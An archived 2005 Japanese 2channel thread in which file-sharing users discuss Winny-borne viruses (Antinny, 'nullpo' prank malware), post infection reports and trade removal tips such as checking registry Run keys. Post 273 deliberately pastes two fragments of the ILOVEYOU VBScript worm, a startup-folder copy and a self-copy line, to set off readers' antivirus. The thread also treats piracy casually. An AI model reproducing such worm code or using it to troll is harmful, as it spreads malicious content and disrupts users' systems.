てか、mellpoの情報少なすぎ
>>266
両方使えよ
俺は、Norton2003+バスターオンラインを使ってる
片方にしか検出されないウイルスがあるからな
268:[名無し]さん(bin+cue).rar
05/02/06 17:05:57 9PL10oeW0
mellpoはシャレのほうで流行(というほどひっかからんが)じゃないか?
ずっと地引しているけど、50件ぐらいしかひっかからん
269:[名無し]さん(bin+cue).rar
05/02/06 18:39:33 EocYspfo0
>>266
2ch専ブラのログってオチは無いよな?
270:[名無し]さん(bin+cue).rar
05/02/06 19:58:25 UweBoUFo0
>>269
ログってウイルスなのか?
271:[名無し]さん(bin+cue).rar
05/02/06 20:00:38 cGi3nN9+0
>>270
先生がウイルスコードに反応する
272:[名無し]さん(bin+cue).rar
05/02/06 20:03:30 Osr1dyrw0
>>270
たまにわけわからん文字列を書くやつがいるだろ。
先生は感度がいいんで、それをウイルスと混同する。
eicarのコードを書き込んでも反応するんじゃないかな?
273:[名無し]さん(bin+cue).rar
05/02/06 20:13:28 ybSFv8wW0
___
_l≡_、_ |_ (
(≡´ⅴ`) ) ウイルスコードなんてしらねーよ・
<__ヽyゝヽy━・
/_l:__|
lL lL
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\LOVE- LETTER-FOR-YOU.TXT.vbs
274:[名無し]さん(bin+cue).rar
05/02/06 20:29:21 YjUhjOkk0
>>273
死ね
275:[名無し]さん(bin+cue).rar
05/02/06 20:34:24 ybSFv8wW0
>>274
うるさいよ、厨房
このスレに出入りして、さらにノートンとログブラウザ使ってる人間なら
ウイルスコードの誤作動の回避のための除外設定してないやつがいるわけないだろ
276:[名無し]さん(bin+cue).rar
05/02/06 20:38:11 rJV6Tdi90
むしろあぼーん指定。
277:[名無し]さん(bin+cue).rar
05/02/06 20:40:14 ybSFv8wW0
いやブラウザによるあぼ~んじゃ誤作動するから
278:[名無し]さん(bin+cue).rar
05/02/06 20:48:41 ot7/gjwp0
>>275
ハァ。厨房はお前だよ。
ネット&ウイルス検証用のマシンで頻繁に再インスコするから面倒で設定してないわけだが。
279:[名無し]さん(bin+cue).rar
05/02/06 20:53:54 a+FGygsQ0
今、ノートンがこのスレで反応したぞ。JaneStyleじゃ透明あぼーんでも駄目だな。
280:[名無し]さん(bin+cue).rar
05/02/06 21:03:13 Osr1dyrw0
透明あぼーんは読み込んでから、ルールに従って非表示にしてる
っぽいからな。ファイル自体を検証する先生は反応するだろう。
>>275はこれに反省して、今後二度とウイルスコードを貼らない
と誓え。
281:[名無し]さん(bin+cue).rar
05/02/06 21:05:50 ybSFv8wW0
ちょっと待て面倒とかほざく>278はともかく
>279とかは本気で除外とか知らんのか?
282:[名無し]さん(bin+cue).rar
05/02/06 21:06:27 V3CzvDms0
いいから触んな
>>275みたいな反応する奴がまともに忠告聞き入れると思うか?
黙ってIDであぼんしる。
283:[名無し]さん(bin+cue).rar
05/02/06 21:09:50 jWWdIOPP0
今ここでageたら、ダウソ板見ただけでウィルスに感染しました、という馬鹿が出るわけだな
284:[名無し]さん(bin+cue).rar
05/02/06 21:11:51 ybSFv8wW0
>>283
IEでは無反応
一度ログを取り込む専用ブラウザだから誤動作する
ageてもそれで被害が広がるわけではない
つか、本気でそれぐらいの仕組みもわからないのか?
285:[名無し]さん(bin+cue).rar
05/02/06 21:24:21 qyOpd75d0
ダウンフォルダの中に「zi0o.u30」という謎のファイルが転がってるのですが
これはなんなんでしょう・・
【使用OS】:XP
【WindowsUpdateしてるか:お知らせがある都度している
【使用AntiVirusソフト】:ウイバス
【AntiVirusをUpdateしてるか】:常時行っています
【ウイルススキャンの結果】 :現在スキャン中
【Winnyのバージョン】:2b71
【Winny歴、総DL量】: 半年
【テンプレを読んだか】: 読みました
【テンプレにある対策を実行したか】:
指定されているフォルダ等チェックしましたがおかしいファイルは確認できてません
【症状、具体的に分かる限りすべて書く】:
とりあえず怪しいファイルはこれひとつのみでnyフォルダ上、システムフォルダ上に異常はありません
【何をしたらそんなことになったのか】:
落としたファイルを整理しているときに作成されていました
ファイルを同フォルダ内に解凍という作業を何回か行っているうちに
作成されたと思います。それまでには確認されていません
【これまでにとった措置】
ファイルはごみ箱に移動後消去。ウィルススキャン。
発見後nyは起動していません
286:[名無し]さん(bin+cue).rar
05/02/06 21:40:07 LWVCKB1T0
>>285
>>1の最初声に出して読め
287:[名無し]さん(bin+cue).rar
05/02/06 21:53:45 WZspEfhk0
バスター2005にアップデートしてから、落としたファイルにどんな怪しいexeが入ってようと全く反応しなくなった。(設定はちゃんとしてる)
まあ前みたいに駆除できないのにウイルス検出しました!ってしつこく出ないからいいけど。
288:[名無し]さん(bin+cue).rar
05/02/06 22:30:24 t/KCdhC80
いいのか?
289:[名無し]さん(bin+cue).rar
05/02/06 23:12:40 PO5OQcip0
>>283
そもそも未だにそんなコードに引っ掛かる様な野師居ないだろ?
他所の板ならまだしも、ここに来るような野師は設定で回避済みだろ・・・
290:[名無し]さん(bin+cue).rar
05/02/06 23:30:53 nl8yXChF0
同意。
291:[名無し]さん(bin+cue).rar
05/02/06 23:36:52 a+FGygsQ0
俺は変えてねーな。別に被害はねーし
292:[名無し]さん(bin+cue).rar
05/02/06 23:43:20 s3x1bN+g0
>>291
>>279みたいな反応が釣りを増長させて
他の住民に迷惑かけることも気にしろよ
293:[名無し]さん(bin+cue).rar
05/02/07 00:09:40 3WuLpAw70
初めて、ポート変えてみた
ファイアウォールログを見てみると
凄い勢いで前のnyポートにアクセスがある
294:[名無し]さん(bin+cue).rar
05/02/07 00:13:24 5yUxK6f20
>>293
ここはお前の日記帳じゃないっ
295:[名無し]さん(bin+cue).rar
05/02/07 01:10:28 01/ZIomG0
>>293
チラシの裏にでも書いてろっ
296:[名無し]さん(bin+cue).rar
05/02/07 01:31:12 jq2iDJat0
俺もはやく使ってみたい>チラシの裏にでも書いてろっ
297:[名無し]さん(bin+cue).rar
05/02/07 03:06:45 9dNmdl470
>>296
チラシの裏にでも書いてろっ
298:[名無し]さん(bin+cue).rar
05/02/07 03:42:34 WkgXewG70
チンコかゆい
299:[名無し]さん(bin+cue).rar
05/02/07 03:47:26 u0/W3fgY0
病院へ逝け
300:[名無し]さん(bin+cue).rar
05/02/07 09:38:03 jff/gz5V0
毎日風呂に入って下着も替えろ。
301:[名無し]さん(bin+cue).rar
05/02/07 15:06:38 fN/XNF0W0
それでも痒いんですが…。
302:[名無し]さん(bin+cue).rar
05/02/07 15:20:23 CjrSnF4v0
切れ!
303:[名無し]さん(bin+cue).rar
05/02/07 15:33:31 wnMIBQAD0
かゆくなるのは玉のほうだろ
304:[名無し]さん(bin+cue).rar
05/02/07 15:43:17 7gmUkW5G0
キンカン塗ると(・∀・)イイ!!
305:[名無し]さん(bin+cue).rar
05/02/07 15:46:19 +MnNa7vf0
メンソレータム塗るともっと(・∀・)イイ!
306:[名無し]さん(bin+cue).rar
05/02/07 15:49:58 3IIPwDdF0
質問にはテンプレを使いましょう。
307:[名無し]さん(bin+cue).rar
05/02/07 18:32:19 gVJkWv8j0
またウイルスか
マカフィー先生ありがとう
もう三回ぐらいひっかかってんな俺
308:[名無し]さん(bin+cue).rar
05/02/07 18:34:35 S7ePl6dF0
マカフィーの法則
309:[名無し]さん(bin+cue).rar
05/02/08 01:43:00 21r51iCG0
ちょいとお尋ねしますが、
他のファイル共有ネットワークでウィルスが
見つかった可能性があるなら、どこに報告すればいいの?
310:[名無し]さん(bin+cue).rar
05/02/08 02:06:21 XLylscR20
そのソフトの本スレじゃないの
311:[名無し]さん(bin+cue).rar
05/02/08 22:01:17 Gy40dB8A0
>>260
サンクス
完全解決しますた
312:[名無し]さん(bin+cue).rar
05/02/08 22:58:40 O3IVKmrB0
URLリンク(uploader.zive.net)
この写真削除したけど、開くとどうなるか詳細教えて
313:[名無し]さん(bin+cue).rar
05/02/08 23:05:05 e3wIJdWc0
どうにもならない手遅れ
314:[名無し]さん(bin+cue).rar
05/02/08 23:09:07 O3IVKmrB0
>>313
ウィルス名で言うと何になるんですか?
これ拡張子がjpgなのに、jpgが開くときの脆弱性を利用して、
ウィルスを混入させるんでしょ?正直どういう仕組みなのかよくわからん
教えてください。
315:[名無し]さん(bin+cue).rar
05/02/08 23:11:56 gb/Lwtpb0
>>314
そんなことより
その圧縮ファイルのアイコンはなんてソフトのもの?
316:[名無し]さん(bin+cue).rar
05/02/08 23:29:47 O3IVKmrB0
>>315
ラプラスだけど
で、ウィルスのプログラムに詳しい方ご教授ください。
317:[名無し]さん(bin+cue).rar
05/02/08 23:35:17 gb/Lwtpb0
>>316
㌧クス
318:[名無し]さん(bin+cue).rar
05/02/08 23:37:57 O3IVKmrB0
>>317
ちなみにスペルはLhaplusね
319:[名無し]さん(bin+cue).rar
05/02/08 23:44:27 idwot2um0
ここ久しぶりに来たけど苺キンタマ以来目立った新種は出てないみたいね。
320:[名無し]さん(bin+cue).rar
05/02/08 23:47:21 O3IVKmrB0
>>319
こち亀exe
321:[名無し]さん(bin+cue).rar
05/02/09 01:42:45 VKcaXPNN0
で、画像見ないでレスするけど>>312の画像ってあやしげなjpgをそのままうpしてんの?
対象をアーカイブに圧縮して「解凍してできるjpgが」ってなら話はわかるが、怪しげなファイルを
そのままうpしたんならウィルスうpしたってことだろ。違法じゃねーの?
322:[名無し]さん(bin+cue).rar
05/02/09 01:52:52 O2/Dnxa+0
この板で違法うpを咎めたところで野暮だよ
逮捕される奴は逮捕される
323:[名無し]さん(bin+cue).rar
05/02/09 02:19:03 xDzEKmpT0
>321
画像見ないでレスする意味がわからん
感染すると思ってビビるほどの低スキルなやつが偉そうに能書きたれるわけもないし
324:[名無し]さん(bin+cue).rar
05/02/09 02:25:39 Zpz0uABU0
とりあえず>>312よ
>1読まないにも限度があるぞ
325:[名無し]さん(bin+cue).rar
05/02/09 10:32:54 U6ZnYu+o0
このスレの基本的な流れはキンタマ並のウィルスが出回るまで待ちながら
その他の報告に「>>1読め」で無視する流れ
326:[名無し]さん(bin+cue).rar
05/02/09 12:08:11 j1h3syDn0
>>312
はウィルスでもなんでもない
デスクトップキャプチャしてるだけ。
害はないよ。
327:[名無し]さん(bin+cue).rar
05/02/09 13:15:25 wxOqPPuW0
半端にスカすとここまでレス進む
328:[名無し]さん(bin+cue).rar
05/02/09 16:24:59 2RGwgY250
age
329:[名無し]さん(bin+cue).rar
05/02/09 17:58:26 hh2/SOq10
しかし、なんだな
今更exeとかフォルダ偽装とか踏むやついるんだな
キンタマ級の新手が出てきても、そうそう踏ませるのが難しいのでは?
と思ったが。踏むやつはいつになっても踏むのか…、それとも新参も増えてるのか…
330:[名無し]さん(bin+cue).rar
05/02/09 18:38:25 oSvcFUc60
>>312
マジレスするとスパイウェアだがイマイチたいしたこと無い
放置しれ
331:[名無し]さん(bin+cue).rar
05/02/09 19:01:09 2d3y+TiF0
>>330
312の写真は金子で見れば、削除するけど
他のjpgファイルに組み込まれたら怖くないか
ってか、すでにあるの?
332:[名無し]さん(bin+cue).rar
05/02/09 19:51:00 PQZQLfXS0
今度はpngか・・・
333:[名無し]さん(bin+cue).rar
05/02/09 19:53:22 nXOstONM0
新作のプリ×キュアマダー?
334:[名無し]さん(bin+cue).rar
05/02/09 19:54:09 nXOstONM0
誤爆
335:[名無し]さん(bin+cue).rar
05/02/09 19:59:30 B3a3tz0V0
>>331
何言ってるのかさっぱりワカンネ
特に一行目
336:[名無し]さん(bin+cue).rar
05/02/09 20:43:40 3meF1n5f0
最近よくファイルやアプリが応答なしってなるんだけど
こんなウイルスってある?
337:[名無し]さん(bin+cue).rar
05/02/09 20:45:53 Jad6FhQ40
スレ違い。初心者スレに行ってくれ。
338:[名無し]さん(bin+cue).rar
05/02/09 20:56:07 2d3y+TiF0
>>335
金子の写真以外に
ウィルスが組み込まれたjpgはあるのか?ってこと
339:[名無し]さん(bin+cue).rar
05/02/09 20:57:53 xgVpt7RT0
金子の写真ってなに?
340:[名無し]さん(bin+cue).rar
05/02/09 20:58:48 B3a3tz0V0
> 金子の写真
('A`)……?
341:[名無し]さん(bin+cue).rar
05/02/09 21:01:55 2d3y+TiF0
金子は47氏のこと
>>312の写真は金子じゃないの?
342:[名無し]さん(bin+cue).rar
05/02/09 21:04:28 B3a3tz0V0
もう一度47氏の写真とその画像を見比べてごらん
同一人物に見える?
明日早速眼科か精神科に行った方が良いよ。
343:[名無し]さん(bin+cue).rar
05/02/09 21:08:13 2d3y+TiF0
>>342
そうなんだ、、、勘違いしてた。
まぁ誰かは知らないけどこの男の写真以外にも
危険なjpgってあるの?
344:[名無し]さん(bin+cue).rar
05/02/09 21:13:41 LTHSwe0q0
>この男の写真以外にも危険なjpg
自分の認識だと赤シャツ男は、初代ヌルポの副産物であって
無害だが鬱陶しいとそういう感じだったのだが…
345:[名無し]さん(bin+cue).rar
05/02/09 21:15:41 B3a3tz0V0
大体、もし赤服眼鏡の写真が危険なコードを含んでたら
>>312みたくサムネイルを見た時点で感染してるんじゃないか?
危険なJPGが(あるとして)他にも存在するか、という問いなら
あるかもしれない、と答えるだろう。
nyにあるか、というと誰にもわからないけどな。
まず無いと思うけど。
346:[名無し]さん(bin+cue).rar
05/02/09 21:22:01 xgVpt7RT0
危険なjpgってただの”.jpg .exe”とかじゃねえのか。
それとも俺の知らない間にjpgウィルス出回ってるの?
347:[名無し]さん(bin+cue).rar
05/02/09 21:27:13 2d3y+TiF0
掲示板なんかで、拡張子が.jpgのリンクでも実は画像じゃなくてウィルスサイトに飛ばされる
ことってあるじゃん。2ちゃんにもよく張られてる。
このことと、nyは関係が無いかもしれんが気になった。
348:[名無し]さん(bin+cue).rar
05/02/09 21:27:41 B3a3tz0V0
いや、確かJPGにあるコードを入れておくとウイルスになるっつーのはあった気がする。
でも俺の知ってる奴は、あらかじめexeがハードディスク内にある場合に限り発動するってやつだけど。
JPG画像ファイル単体でウイルスの役目を果たすようなものってまだ無いんじゃないか?
セキュリティホール突くのは別として。
349:[名無し]さん(bin+cue).rar
05/02/10 00:20:38 li/KneUL0
【使用OS】Win2000 SP4
【WindowsUpdateしてるか】はい
【使用AntiVirusソフト】Norton AntiVirus 2003
【AntiVirusをUpdateしてるか】はい
【ウイルススキャンの結果】検出なし
【テンプレを読んだか】はい
【症状、具体的に分かる限りすべて書く】
C:\temp000が作られ(中身は空)、UpFolder.txtに追記されてました。
他、ずっと昔に流行ったozawa.exeのような挙動(白目のない女性の恐怖画像が画面一杯に突然出る。ザザザーのような音も出る)が出てる
これ何すか?
350:[名無し]さん(bin+cue).rar
05/02/10 00:23:56 NZbrBGBV0
ここは初心者の質問・救済スレではありません
351:[名無し]さん(bin+cue).rar
05/02/10 00:43:16 ybgwBGKq0
>>349
でもノートン入ってるのにかかるなんておかしな話だ
352:[名無し]さん(bin+cue).rar
05/02/10 00:44:08 kTvOqxaG0
>>349
そういう挙動をするプログラムなんじゃないの?
353:[名無し]さん(bin+cue).rar
05/02/10 01:02:36 li/KneUL0
すいません、Antinny系でozawaな挙動を示すものなど聞いたこともないので
(検索しても見付からないので)質問してしまいました。
もちろん単なるozawa+Antinny同時感染も疑いました、が、
WIN.INIを確認したところRun=の行自体がなく、
ozawa.exeとmadoka.exeを全探索しましたが見付かりませんでした。
また出た。この女が。こわい...
354:[名無し]さん(bin+cue).rar
05/02/10 01:07:50 3EO3/V1T0
新種というか亜種だろうな
最新のウイルス定義でも全ての亜種を防ぐわけじゃないから
355:[名無し]さん(bin+cue).rar
05/02/10 01:08:16 L+wkb+490
タスクマネージャで怪しいプロセス片っ端から閉じろ
それから感染元は何か調べる。後はしらね
356:[名無し]さん(bin+cue).rar
05/02/10 01:17:44 jpXD2K630
>>353
再インスコしとけ、それが嫌ならその女一生飼っとけ。
357:[名無し]さん(bin+cue).rar
05/02/10 01:29:18 li/KneUL0
ともかくozawa部分だけでもどうにかしようとあがくも、どこから起動しているかすら分からない
HKLM\Software\Microsoft\Windows\CurrentVersion\Run
ひとつひとつ検索したが、mp3infpとTweakMeUp以外全部ハードウェアもの
HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceは空
前述の通りWIN.INIにRun=なし
しかし再起動するとozawa
358:[名無し]さん(bin+cue).rar
05/02/10 01:38:52 D7UbV5eS0
>>357
感染元のファイル名すら書かない君にぴったりの言葉を贈ろう
日記はチラシの裏に書け(AA略)
359:[名無し]さん(bin+cue).rar
05/02/10 01:42:43 nbd5RrmZ0
>357
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
とかスタートアップは?
あとはタスクマネージャのプロセスを全部調べるってとこか
360:[名無し]さん(bin+cue).rar
05/02/10 02:10:23 E/bQZxZE0
>>357
ノートンに報告入れといてね
361:[名無し]さん(bin+cue).rar
05/02/10 02:28:40 zzy+oPI00
みんな踏みまくってるよ。フォルダ偽装なんて知らないやつだらけ。
ウイルスなんて自分は関係ないと思ってる。
362:[名無し]さん(bin+cue).rar
05/02/10 02:54:42 H8Cx+fOD0
>白目のない女性の恐怖画像が画面一杯に突然出る。
>ザザザーのような音も出る
わかっててもコワイな
363:[名無し]さん(bin+cue).rar
05/02/10 05:08:57 vgDMncNg0
ウイルスじゃないから、PCに盛り塩するといいよ。
364:[名無し]さん(bin+cue).rar
05/02/10 05:12:02 psrLZGN30
窓から投げ捨てろ
365:[名無し]さん(bin+cue).rar
05/02/10 06:32:54 Js4DoeKW0
ウイルス撒くやつも踏ませようといろいろ考えてるね
CG集の前編フォルダなるものにはちゃんと画像をいれてて
後編フォルダなるものが.folderなのはワロタよ
366:[名無し]さん(bin+cue).rar
05/02/10 07:54:05 li/KneUL0
>>359
ビンゴ>HKCU
Microsoft製品ではないsyscheck.exeがC:\WINNTにありました
HKCUにもRunがあったとは...
367:[名無し]さん(bin+cue).rar
05/02/10 14:07:06 0o5Ll/4G0
除霊されますた
368:[名無し]さん(bin+cue).rar
05/02/10 21:46:13 LVJVrD/UO
W32/Pate.b
ってウイルスに感染してしまいました。
ダウンロードしたファイルは一応スキャンしたんですが・・・
とりあえずググッてみても駆除方法がわかりません
バカなワシにご指導を・・・
369:[名無し]さん(bin+cue).rar
05/02/10 22:25:45 A33DbpE40
/" ̄'ヽ, /" ̄ヽ,
/ , i. / i
,' / i-─-.,' / ',
! ,' .i i / 、 i
.! .!'ー'´ 'ー"´ ヽ i
! ! ,ヘ , λ , ,イ ',__,ノ
ヽ,_ _,ノr'-+ーイ ノ -i- 、i ゝ
)  ̄.レイ r;:=-;、レ゙ r;=;:t iイノイ
i i .! ヒ__,! ヒ_,!! ,' i、
/ i λ."" ! .i
i .人 ゝ - ,.イ /〈
) ノヽノ、レ'イ`yー--r ,くリレ'ヽノ
レヽr ´ゝ,.-- 、`ー-ー'y- 、
/ / 、ノ777777777777t
i i ||| |
ゝr⌒/ . ||| .知っているが |
', ´ .||| .お前の態度が|ヽ
, '"y- イ||| 気にいらない r'^ヽ
',/ ./||| ( i
/ ll.L___________________」ー'"
370:[名無し]さん(bin+cue).rar
05/02/10 22:36:07 C+9Iu0zT0
>>368
先ず最初に>>1じっくり見つめるんだ
そして深呼吸をして1行1行丁寧に詠んで行く
リズムは乱さないようにな
そうすれば何をするべきかが見えてくるぞ
371:[名無し]さん(bin+cue).rar
05/02/10 22:37:02 QU524JCE0
今日の朝、ノートン2005のログを見ていたらファイルを
ウイルススキャンしてW32.HLLW.Antinnyが引っかかり手動で削除しましたと
あったのですが感染を水際で防ぎ感染していないとみていいのでしょうか?
念のためシステムの完全スキャンをしてみても何もひっかかり
ませんでした。nyが入っている外付けHDDも一応スキャンしても何も検出
されず、感染したと思われる兆候も見た感じではないみたいです。
昨晩私が寝ている間に
ファイルを開こうとした●が開く前?にウイルススキャンをして何かを
削除したこと、削除後そのファイルを開こうと必死になったこと
しか把握してなくてウイルス入りファイルを実行しちまったのか
覚えてなくて困ってます。
372:[名無し]さん(bin+cue).rar
05/02/10 22:42:10 3EO3/V1T0
アンチウイルスソフトが何のためにあるのかと(ry
373:[名無し]さん(bin+cue).rar
05/02/10 23:17:31 dg5QlmdD0
つか>>1をちゃんと読んだのかと(ry
374:[名無し]さん(bin+cue).rar
05/02/10 23:46:34 TGY6uaPC0
ノートン先生も報われないよな
375:[名無し]さん(bin+cue).rar
05/02/10 23:47:57 SmFl9iFM0
こんなところでてぬを見ることになるとは思わなかった
376:[名無し]さん(bin+cue).rar
05/02/11 00:08:26 Z6O4gaKm0
先生はワーカホリック
377:[名無し]さん(bin+cue).rar
05/02/11 02:30:28 /5B8jTis0
>>371
検疫ログ見ればどのファイルか分かるだろうから、
もう一度キャッシュからファイル変換してみ。
先生、怒らないから。
ついでにバックアップを提出しとけ。
378:[名無し]さん(bin+cue).rar
05/02/11 03:03:08 4cp1HU0N0
W32.HLLW.Antinny について質問させていただいて、よろしいでしょうか?
379:[名無し]さん(bin+cue).rar
05/02/11 03:05:33 WgRPIS2p0
>>1
380:378
05/02/11 03:11:11 4cp1HU0N0
>>379
あっ!すすみません!
改行がおおすぎる、とゆわれたので2つにわけます。
【使用OS】
Windows2000 Professional
【WindowsUpdateしてるか】
あまりしていません・・
【AntiVirusは何を使っているか】
antivirusを知りません。。ごめんなさい。。
【ちゃんとUpdateしてるか】
【スキャンした結果(ウイルス名・発見場所)】
W32.HLLW.Antinny
Program FilesのCommon Files→Microsoft Shared→MSInfo→msinfo32.exe
【別のオンラインスキャンしたならその結果は】
【症状を具体的に、分かる限りすべて書く】
1.起動している最中に本体から変な音がする(ガガガガ等)
2.windows画面になった途端、ポーンとエラー音がなる(怪しすぎる!)
3.マウスの調子が悪くなる(ダスクトップにあるアイコンはクリックできない)
4.スタートメニューからコントロールパネルを開こうとしても開かない
5.スタートメニューからエクスプローラで開くとうまくいく(場合がある)
6.エクスプローラからコントロールパネルを開こうとすると「アクセスは拒否されました」
のようなエラーメッセージが出る
7.ウイルスチェックをすると2つ見つかり、1つは駆除できましたがもう1つは出来ず
再起動してもう一度ウイルスチェックすると、なぜかウイルス検出0になっている。
8.2時間ほどパソコンを放っておくと通常どうり操作可能になる。
381:378
05/02/11 03:12:36 4cp1HU0N0
【何をしたらそんなことになったのか】
いきなり突然、です。同居者と共有しているもので、明確にはわからないです。
【これまでにとった措置】
ウイルスを削除。
W32.HLLW.Antinny はwinnyを狙ったワームと聞きましたが
私はwinnyを使ったことがありませんし、このファイルももっていません。
winnyを使ってない人の所へ入ったり、又、入ったとして被害が出たりするのでしょうか?
よろしくお願いします!
382:[名無し]さん(bin+cue).rar
05/02/11 03:23:18 6uJ6wsXI0
>>380
単にHDDが壊れかけだけなんじゃ。
383:[名無し]さん(bin+cue).rar
05/02/11 03:27:00 xDS0Wek10
>>380
Program Filess下のmsinfo32.exeを上書き(?)って初見だな、2000特有のものらしいし
取りあえずぁゃιぃプロセスを止めて、親ファイル削除、そしてレジストリ修復
まぁ、他にもなんか感染してそうだし素直にクリーンインスコを勧める
因みにny使用者でなくても物を踏めば感染する
どうでも良いが、「いう」を「ゆう」と表記するのは止めた方が良い
384:[名無し]さん(bin+cue).rar
05/02/11 03:31:31 Dl+HrxDX0
>>380
その「同居人」とやらがWinnyを使ってないという保証もないしな。
385:[名無し]さん(bin+cue).rar
05/02/11 03:50:02 Rsui7PMx0
>>379は
『まず、ここは初心者の質問・救済スレではありません。』
のことを示したかったと思うんだがどうよ
386:[名無し]さん(bin+cue).rar
05/02/11 04:59:27 SWWJjqCl0
どう考えてもそうだろ
387:[名無し]さん(bin+cue).rar
05/02/11 05:51:29 j8Jgm6140
しかもage質ときたもんだ
388:[名無し]さん(bin+cue).rar
05/02/11 10:13:46 1Hlxlk8c0
てゆーかnyを使った事もない人間が、antinyだからってこのスレに来たって言うわけ?
普通このスレ見つけるより先にセキュ板かなんかにいくと思うんだが。
まぁそれはそれとして。
スタートアップ系のチェックと現プロセスの確認ってところじゃないのかあとは。
全フォルダ精査してnyが無いか探してみるとか。
OS再インストールが最強。
389:やりすぎ
05/02/11 10:55:28 B8b+zTyqO
仙台凶暴だな
マイドキュメント直撃かよ。。。
390:378
05/02/11 13:05:47 4cp1HU0N0
どうもありがとうございました。
今日は変な音もしませんでしたし、操作は何故かスムーズにいきました。
もうちょっと様子をみてから色々ためしてみます!
391:[名無し]さん(bin+cue).rar
05/02/11 13:24:19 r5q7HNlK0
.me11p0
ってファイルが流れてて
ためしに落として調べたらパス付きzipだった
中身はどうやら.IAF
URLリンク(ccfa.info)
これってやばくないか?
392:[名無し]さん(bin+cue).rar
05/02/11 13:35:03 y8XwQ1fv0
そりゃデータ元の人間にとってはやばいだろうな。メルアド悪用されるかもしれんし
.me11p0ってめるぽか
393:[名無し]さん(bin+cue).rar
05/02/11 14:04:50 nhGdSyay0
一言だけ言っておくけどな
ここはsage推奨じゃないぞ
基本的に質問するときはageるものだ
394:[名無し]さん(bin+cue).rar
05/02/11 14:22:34 2hSJUG150
age質もあくまで最新ノートンやバスターで検出されないものに限るけどな
395:[名無し]さん(bin+cue).rar
05/02/11 14:26:24 j8Jgm6140
>>393
一言だけ言っておくけどな
ここは質問スレじゃないぞ
基本的に質問するときは質問スレでするものだ
396:[名無し]さん(bin+cue).rar
05/02/11 16:01:33 nhGdSyay0
>>395
なるほど。
397:[名無し]さん(bin+cue).rar
05/02/11 16:07:10 z5wHpDot0
ちょっとスレ違いかも
そもそもWinnyを媒介にするウイルスってUpFolder.txtを書き換えて拡散させようとするんだから、
WinNT系ならUpFolder.txtの属性を、読み込みのみ書き込み拒否属性に書き換えればウマーなんじゃないかと
欄検眼段のウイルスにかかった友達のPCを直してて気づいた
何で早く気づかなかったんだろう自分
398:[名無し]さん(bin+cue).rar
05/02/11 16:23:18 y8XwQ1fv0
>>397
では次は実験だ
読み取り専用にしたaaa.txtと、別のフォルダにもう一つaaa.txtを用意して、
読み取り専用でないほうを読み取り専用のaaa.txtがあるフォルダに移動してみるんだ。
まあそれ以前に、ワーム系の機能がなくともローカルフォルダのものを勝手にうpさせられることが十分痛手なんだから
拡散防止措置を考える前にウイルスプログラムを実行しないようにしろってこった
399:インリン
05/02/11 17:47:25 B8b+zTyqO
エロゲーイメージをマウント。。。
なんだなみんな。きっと
400:[名無し]さん(bin+cue).rar
05/02/11 18:09:31 Jqo5N8BU0
>>397
URLリンク(www.microsoft.com)
> 一度プログラムを実行すると、
> そのプログラムはあなた自身がコンピュータで実行できる処理を
> 何でも行うことができるようになります。
401:[名無し]さん(bin+cue).rar
05/02/11 18:18:28 NbmY9W1i0
>>399
で?
402:[名無し]さん(bin+cue).rar
05/02/11 18:36:52 B8b+zTyqO
お疲れさまです(笑)
403:[名無し]さん(bin+cue).rar
05/02/11 21:25:37 7ioOqnvqO
初めまして。突然ですが質問させてください。
1週間くらいnyを起動しっ放しで
今日久しぶりにパソコンをいじってみたら
なぜか重いのでとりあえず再起動してみたら
パスワードが間違ってい るで(正確なパスなのに)ユーザーログインできません。
ユーザーアカウントはこれ一つなので
今何もできない状態です。
このようなことをするウイルスは出回っているのでしょうか?
今は携帯からアクセスしています
どうかご指摘お願いします。
404:[名無し]さん(bin+cue).rar
05/02/11 22:19:05 BaTs3hlv0
>>403
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄」
―――――――‐┬┘
____.____ | .__ パソコンを
| | | | |\_\ 窓から
| | ∧_∧ | | | |.◎.| 投げ捨てろ
| |( ´∀`)つ ミ | | |.: |
| |/ ⊃ ノ | | .\|.≡.|
 ̄ ̄ ̄ ̄' ̄ ̄ ̄ ̄ |  ̄ ̄
405:[名無し]さん(bin+cue).rar
05/02/11 22:45:48 uQxbXYyh0
スマソ。色々調べてみたんだけど、よくわからんのでお聞きします。
XP起動時にHDからアクセス音が止まりません。タスクマネージャを開いてみると
「MM」というプログラムが実行されており、このタスクを終了させるとHDへの
アクセスは止まります。プログラムのアイコンはUNと書かれたものでした。
これって何なんでしょうか?
406:[名無し]さん(bin+cue).rar
05/02/11 22:49:30 Rsui7PMx0
(´・ω・`)しらんがな
407:[名無し]さん(bin+cue).rar
05/02/12 00:11:08 aJ0bMzDt0
質問テンプレも読まないやつが厚顔無恥に書き込むこんな世の中じゃ(ry
408:[名無し]さん(bin+cue).rar
05/02/12 00:17:15 rXp7usQA0
ポイズン
409:[名無し]さん(bin+cue).rar
05/02/12 03:02:31 m1VjmALg0
WinXPSP2、WU済み
ノートンUpdate済み
(一般コミック・雑誌) [ジャンプ] [2005-11] DEATH NOTE page.57 「二択」.zip UperOOnise 1b1ee36abf324cf4ccdaca3d245391f4
に入ってたexe踏んじゃった・・・
zip解凍するとWinRARアイコンのexeファイル(サイズ:2.28 MB)とUpper.mp3
exe実行でデスクトップキャプチャ(ユーザー名のデスクトップ.bmp)、
壁紙変更(まだ懲りないの?.bmp *内容:晒されたっていいじゃないの 泥棒だもの ぬるぽ)
MP3は先に消したので分からないが、音が鳴るのかも
nyのiniにぬるぽ無し、Upフォルダ追加無し、Upfolder.txt追記無し
レジストリはよく分からないが、HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
には変わった値はない気がする
Cドライブを.exeで検索後、更新日時、作成日時でソートしたが怪しいファイルは見つからず
ウィルススキャンしても検出出来ず
これは既出?
410:[名無し]さん(bin+cue).rar
05/02/12 03:02:49 jfgwByGq0
<404
国へ帰れ。
411:[名無し]さん(bin+cue).rar
05/02/12 03:13:46 Q3/xb0y10
「晒されたっていいじゃないか泥棒だもの ぬるぽ」
ウィルスに引っかかって勝手に変えられた壁紙だけど・・・ケッコー気に入った。
ちょうど壁紙探してたから感謝感謝!
412:409
05/02/12 03:27:25 m1VjmALg0
壁紙うpしてみる
bmpだと2Mもあるからpngで。
URLリンク(sylphys.ddo.jp)
なんだか今のところ痛くもかゆくもないんだけど・・・
これから何かあるんだろうか?
